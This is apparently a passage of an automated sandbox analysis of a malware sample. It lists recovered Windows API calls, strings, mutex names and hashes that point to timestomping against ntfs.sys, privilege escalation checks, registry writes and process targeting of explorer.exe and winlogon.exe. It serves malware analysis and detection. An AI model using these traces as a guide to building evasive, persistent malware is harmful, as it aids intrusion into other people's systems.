                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC00E0
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC00F0
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC0109
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BC011C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Processmemset$AllocFreeInternetOptionQueryValidatememcpy
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3911349929-0
                                                                                                                                                                                                            • Opcode ID: 5743bb387d8615b11038e991de635afa20a39f54365ddf834c27831924261390
                                                                                                                                                                                                            • Instruction ID: 706c5575e99de2f8b4e85f26da49726b52a7f303223725eea82b62693c771cb0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5743bb387d8615b11038e991de635afa20a39f54365ddf834c27831924261390
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B331C072A40214ABE760DA68DC88F57B7ACEF48760F148584FA489B281DB30A9158BF0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,-057FF5C8,00000000,00000000,?,?,?,?), ref: 02BBF404
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BBF40B
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BBF41B
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BBF426
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(?,00000000,00000000,?,?,02BF56DC,?,02BF5E1C,-057FF5C8,00000000,00000000,?), ref: 02BBF4EE
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BBF4F5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(?,00000000), ref: 02BBF501
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BBF508
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BBF52E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,-057FF5C8,00000000,00000000,?,?,?,?), ref: 02BBF55A
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BBF55D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BBF56A
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BBF56D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidatememcpy$Allocmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1948005343-0
                                                                                                                                                                                                            • Opcode ID: 54a1fd0513c7341940e0fdc9a5d0da8a2b75890889e8b8aa70a8a384ab5bb858
                                                                                                                                                                                                            • Instruction ID: 1a9e171d959fa5666bec33d9fe6f052f56b3537a4e1abecb4210c1e180beb4cc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 54a1fd0513c7341940e0fdc9a5d0da8a2b75890889e8b8aa70a8a384ab5bb858
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4561A276A00209ABDB21CF68DC84AFEB7A9FF84364F048295FE0597741D7B0D951CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB7B33
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB7B4B
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,?,?,?,?,?,?,76F8F380), ref: 02BB7B6C
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000104,00000000,00000001,?,00000104,?,?,?,?,?,76F8F380), ref: 02BB7B92
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,76F8F380), ref: 02BB7C1D
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,76F8F380), ref: 02BB7C24
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB7C33
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,76F8F380), ref: 02BB7C63
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                            • String ID: software\microsoft
                                                                                                                                                                                                            • API String ID: 4158279268-3673152959
                                                                                                                                                                                                            • Opcode ID: 6e22941ec68c055b5a0fda0f188c028ffb7ac1cf82aaa998a5e4a62ab63356d5
                                                                                                                                                                                                            • Instruction ID: 3c204aad1bfef03f5f911570e24a4f463aeaa38fbf9d434ae79501820aca1d1d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e22941ec68c055b5a0fda0f188c028ffb7ac1cf82aaa998a5e4a62ab63356d5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9541D672900159AFEB25DB748899AFEB7BDEF88304F4045ECE655D3140D7B05A498BA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BC4902
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BC491A
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC4941
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,-0000000B,00000104), ref: 02BC496F
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(-091561A1,software\microsoft,00000000,00000102,00000000), ref: 02BC49CE
                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00000001), ref: 02BC49FE
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(00000000), ref: 02BC4A0C
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 02BC4A1A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AdminCloseFlushOpenUserValuelstrcpynmemsetstrstr
                                                                                                                                                                                                            • String ID: software\microsoft
                                                                                                                                                                                                            • API String ID: 1783443066-3673152959
                                                                                                                                                                                                            • Opcode ID: 7b905e4df933b5df2b0d52c27ae2fc1f2d62af18101dae220ed712ea72695774
                                                                                                                                                                                                            • Instruction ID: 125ec3e8b7df970167459bf06ff61ae1f6c4ed932a4c7ec44b39123f9f7e0629
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b905e4df933b5df2b0d52c27ae2fc1f2d62af18101dae220ed712ea72695774
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC314431A0021DAFDB26CB24DC19BEA7BB8EB05305F1001D8EB55AB140D7B09B48CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 004014C8
                                                                                                                                                                                                            • memset.MSVCRT ref: 004014EE
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,00402CFF,00000104,?,?,?,00000000,00000000,00000000), ref: 00401506
                                                                                                                                                                                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00401529
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040154A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00401557
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040156E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040157B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                            • API String ID: 2248944234-2746444292
                                                                                                                                                                                                            • Opcode ID: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                            • Instruction ID: 14e7369bd1a15e27c4b274561f890c179ee839510f861d06d6d7e351d84cbd4c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF2167B290020C6FDB10DFE8DD84ADF7BBCAB94355F00457AFA05FA240D6349A458BA4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SymGetModuleBase.DBGHELP(00000000,?,?,00000004), ref: 02BB3969
                                                                                                                                                                                                            • SymGetModuleInfo.DBGHELP(00000000,00000000,0000023C), ref: 02BB397C
                                                                                                                                                                                                            • SymGetSymFromAddr.DBGHELP(00000000,?,?,00000018), ref: 02BB3993
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BB39BD
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BB39E1
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Module_snprintf$AddrBaseFromInfo
                                                                                                                                                                                                            • String ID: %s!%s + 0x%04x$%s!0x%08x$unknown!0x%08x
                                                                                                                                                                                                            • API String ID: 844136142-2194319270
                                                                                                                                                                                                            • Opcode ID: dba257e986056fa52ba7f398e4c4a6a7197edc1146340f75abbb2a28b8cb1001
                                                                                                                                                                                                            • Instruction ID: a194af677cccbe824d24f2bd43b07e69aa8db3ed438e2e29214b96dcac3f596f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: dba257e986056fa52ba7f398e4c4a6a7197edc1146340f75abbb2a28b8cb1001
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A21B1725402086BE7228A48DC85FFA77ACEF48745F44C5D5FE4A97101D7B09A588BA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C05
                                                                                                                                                                                                            • GetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?,?,?), ref: 00401C1F
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C35
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C46
                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C62
                                                                                                                                                                                                            • SetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?), ref: 00401C78
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C8E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C9F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • \\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401C00
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileHandle$CloseCreateInformationTime
                                                                                                                                                                                                            • String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys
                                                                                                                                                                                                            • API String ID: 1046229350-2760794270
                                                                                                                                                                                                            • Opcode ID: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                            • Instruction ID: 0895f171d82555aaaa5436e0262d4f4d844cfaf0768df501368bcb823c663742
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE21F9729452187BF7219B50DD09FEF7B6CAF44710F148226FF01B61D0D778964586AC
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02BD32DC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BD32E5
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD32F9
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD330B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CE90), ref: 02BD3316
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,02C0CE90,RFK), ref: 02BD3330
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BD3336
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • RFK, xrefs: 02BD331C
                                                                                                                                                                                                            • Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02BD32D0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                            • String ID: Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$RFK
                                                                                                                                                                                                            • API String ID: 4280258085-839244105
                                                                                                                                                                                                            • Opcode ID: 24d8b0796bf1b5084806773c10a588b87330e9677c123ae96a28df0b61a6ba79
                                                                                                                                                                                                            • Instruction ID: 68e7e0de324b0d8174daebddb69492ad5079e3ec8d8274e16fa552f2c5d7fa9e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24d8b0796bf1b5084806773c10a588b87330e9677c123ae96a28df0b61a6ba79
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0DF0F430AC57006BE26067549C0AF8A77DCAF44B50F808294F79AA3082ABE0A5048FB7
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02BCB91C
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BCB925
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCB939
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCB94B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C15C), ref: 02BCB956
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,02C0C15C,ALPHA), ref: 02BCB970
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BCB976
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • ALPHA, xrefs: 02BCB95C
                                                                                                                                                                                                            • Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}, xrefs: 02BCB910
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                            • String ID: ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
                                                                                                                                                                                                            • API String ID: 4280258085-2415181952
                                                                                                                                                                                                            • Opcode ID: c20510b1f2b2239204ebfb4f40c129a9ad5eeb4ae5556b9e46cf76bde7d83138
                                                                                                                                                                                                            • Instruction ID: 0c2291289010737751c32083843533006e3f3ca20c2a95795d33d8cde7308a2a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c20510b1f2b2239204ebfb4f40c129a9ad5eeb4ae5556b9e46cf76bde7d83138
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71F028306C9705ABE6646B648C0BF1E77ACEF04A48F614648F742A31C0C7E0A6109BB6
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20112), ref: 004028D9
                                                                                                                                                                                                            • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20112), ref: 004028EA
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 004028F6
                                                                                                                                                                                                            • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 00402906
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 0040290C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AdminAtomGlobalUser$AdjustFindPrivilege
                                                                                                                                                                                                            • String ID: PnSw$Wed Jul 6 06:49:26 20112$explorer.exe$winlogon.exe
                                                                                                                                                                                                            • API String ID: 3001685711-2911081799
                                                                                                                                                                                                            • Opcode ID: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                            • Instruction ID: 2c3c2cb6c74497f887580688acf30243e480456bbc90e7420e586ff1c8abd763
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3FF012B07542196AEA1067A1AE0AB5B3A5CDB84790F404177BF04F61D0DAB99C0185FD
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}), ref: 02BCCBAC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BCCBB9
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCCBCD
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCCBDF
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BCCBEE
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C260), ref: 02BCCBF5
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,02C0C260,BSS), ref: 02BCCC0F
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BCCC15
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}, xrefs: 02BCCBA0
                                                                                                                                                                                                            • BSS, xrefs: 02BCCBFB
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutexSleep$BackslashCloseInformationObjectOpenPathReleaseSingleWait
                                                                                                                                                                                                            • String ID: BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
                                                                                                                                                                                                            • API String ID: 3206501308-3528105533
                                                                                                                                                                                                            • Opcode ID: 18cc91e3fe23937bcd13b256a9e11d9d34fd390e9c5b1e27ff8245aa01705b2a
                                                                                                                                                                                                            • Instruction ID: 07205b8d7a50601f808e01faa52239ce530c8c5afb569f8077eb7667d252589e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18cc91e3fe23937bcd13b256a9e11d9d34fd390e9c5b1e27ff8245aa01705b2a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55F02B30A89304BFE2716BA49D09F4E7B98AF09F45F10464DFB5AA31C1CBB084148B72
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: /$UT
                                                                                                                                                                                                            • API String ID: 0-1626504983
                                                                                                                                                                                                            • Opcode ID: e355151980e8e7db0179f7b8e7ad8777610da01e5c13e10714d69e4d926be0d6
                                                                                                                                                                                                            • Instruction ID: 384bbae1b8cb9b404b4eb210d11321773e1088d8e39031f2b5da78fa9990b817
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e355151980e8e7db0179f7b8e7ad8777610da01e5c13e10714d69e4d926be0d6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25F1D475A046588BCF21CF68C8807EEBBB5FF44304F0485EAE948AB346E7719A85CF50
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memcpy$_snprintf
                                                                                                                                                                                                            • String ID: 0$%x$Content-Length
                                                                                                                                                                                                            • API String ID: 4125937431-3838797520
                                                                                                                                                                                                            • Opcode ID: 86ddd8b05012f25dd6450c51854f182c605ca6283b4c79e86f8653ecc269de54
                                                                                                                                                                                                            • Instruction ID: 34e90bcec4c2040c4fe0e1fbbf7858f59ed453a6097e4557e43a112b97be8fc1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 86ddd8b05012f25dd6450c51854f182c605ca6283b4c79e86f8653ecc269de54
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 499192B6600702AFC705DF68DC809BBB7A9FF88314B048B59F91987A41D7B0E854CBA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBB843
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BBB870
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02BBB877
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02BBB889
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02BBB898
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 02BBB8A2
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBB8B4
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BBB8E1
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02BBB8E8
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000215,00000000,?), ref: 02BBB8FB
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$MessageMutexObjectReleaseSendSingleThreadWait$CurrentProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2596333622-0
                                                                                                                                                                                                            • Opcode ID: 32c42720bc7eaf99465c94e3fdf705d3334006c8905539312b91ac6555d4e502
                                                                                                                                                                                                            • Instruction ID: 313fceac71f9d7898753e195fe1b4421e56a67101b079f5dc775f0d645c1fd9b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 32c42720bc7eaf99465c94e3fdf705d3334006c8905539312b91ac6555d4e502
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D21B431A811149BC7644F69A84CEFAB7E8EF487A1B458966F705D72A1C3B09421CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D19C), ref: 02BD4297
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D19C,?,?), ref: 02BD4329
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},?,?), ref: 02BD43B5
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BD59EE
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02BB5DE8,?,?,02BB5DE8,?,00000001), ref: 02BD5A0B
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: SetNamedSecurityInfoA.ADVAPI32(?,02BB5DE8,00000010,00000000,00000000,00000000,00000001), ref: 02BD5A26
